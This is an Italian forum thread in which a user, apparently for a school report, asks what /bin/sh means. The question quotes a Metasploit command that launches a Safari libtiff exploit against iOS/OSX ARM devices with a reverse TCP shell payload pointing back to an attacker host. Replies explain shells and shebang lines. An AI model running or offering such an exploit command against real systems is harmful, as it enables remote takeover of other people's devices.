/bin/sh significato....

[Valeria75_bis]

Ciao a tutti, scusate la domanda banale, mi aiutate a capire cosa identifica

/bin/sh

in un documento ho trovato

<<

This sends /bin/sh to you ... you can do what ever you want after that. If you want to JUST run a command then change your payload....
This is no different than a /bin/sh or bash prompt on any other unix machine.

>>

facendo riferimento a questa stringa

sudo ./msfcli exploit/osx/armle/safari_libtiff PAYLOAD=osx/armle/shell_reverse_tcp LHOST=10.0.0.1 TARGET=1 URIPATH=/pwned SRVPORT=80 E


Grazie mille!!

[PinguinoGoloso]

A occhio sembra un exploit per ottenere una shell con privilegi di root su un sistema OSX, usando un buffer overflow della libreria di safari che gestisce le immagini bitmap patchato non so quanti mesi fa .

[Valeria75_bis]

Si esatto è proprio quello e la mia è solo un'esigenza didattica, per una relazione... niente di pratico ;-)

Potresti rispondere al mio quesito iniziale?

cosa identifica

/bin/sh??

E già che ci sono, dato che mi sembri esperto sull'argomento

la stringa che ho postato cosa fa nel dettaglio??

cosa vuole dire questo

<<

This sends /bin/sh to you ... you can do what ever you want after that. If you want to JUST run a command then change your payload....
This is no different than a /bin/sh or bash prompt on any other unix machine.

>>


e questo:

PAYLOAD=osx/armle/shell_reverse_tcp


??

Grazie ancora

[PinguinoGoloso]

E' il percorso di un eseguibile, nella fattispecie sh che, per convenzione, identifica la shell di sistema (può essere un link a bash, csh, ksh, ecc.).

Bastava una ricerca su wikipedia, comunque: http://en.wikipedia.org/wiki/Shebang_(Unix) .

[Valeria75_bis]

Ma /bin/sh è un comando da eseguire tramite shell??

Cosa intendi per "link a bash"??

Grazie mille!!

[nifriz]

Originariamente inviato da Valeria75_bis
Ma /bin/sh è un comando da eseguire tramite shell??

Cosa intendi per "link a bash"??

Grazie mille!!

VVoVe: VVoVe: VVoVe:

Se leggi quello che ti ha scritto è già tutto spiegato

[Valeria75_bis]

Sarà... ma io non ho proprio capito

[livellozero]

Premesso che non sono un esperto di script, anzi, tutt'altro!
/bin/sh dice che quel file utilizzerà la shell (terminale) che è linkata (ossia avrà un collegamento) al comando sh che è localizzato nella directory /bin (appunto /bin/sh).
La shell utilizzata può essere varia come ti è stato detto precedentemente e viene definita in alcuni file (ad es. .bashrc oppure .bash_profile). Comunque, /bin/sh è come se ti aprisse virtualmente la shell (terminale) predefinita ed è l'intestazione dei file di script quando è dichiarata così: #!/bin/sh oppure #!/bin/bash etc.
Tutto questo fa si che i comandi scritti nello script, vengano eseguiti come se fossero dati direttamente in una shell bash. Il grosso vantaggio è che in uno script (e ce ne sono di molto complessi), una volta che lo si è scritto e avviato, i comandi vengono eseguiti di seguito, senza altri interventi da parte dell'utente, fino al termine dello script e quindi, si evita di dover digitare in un terminale, numerosi comandi!
Questo è molto riduttivo come esempio e una schifezza come spiegazione, ma probabilmente abbastanza semplice per farsi un'idea sul comando #!/bin/sh.

[Valeria75_bis]

Grazie mille!!

Ora è tutto chiarissimo!!!!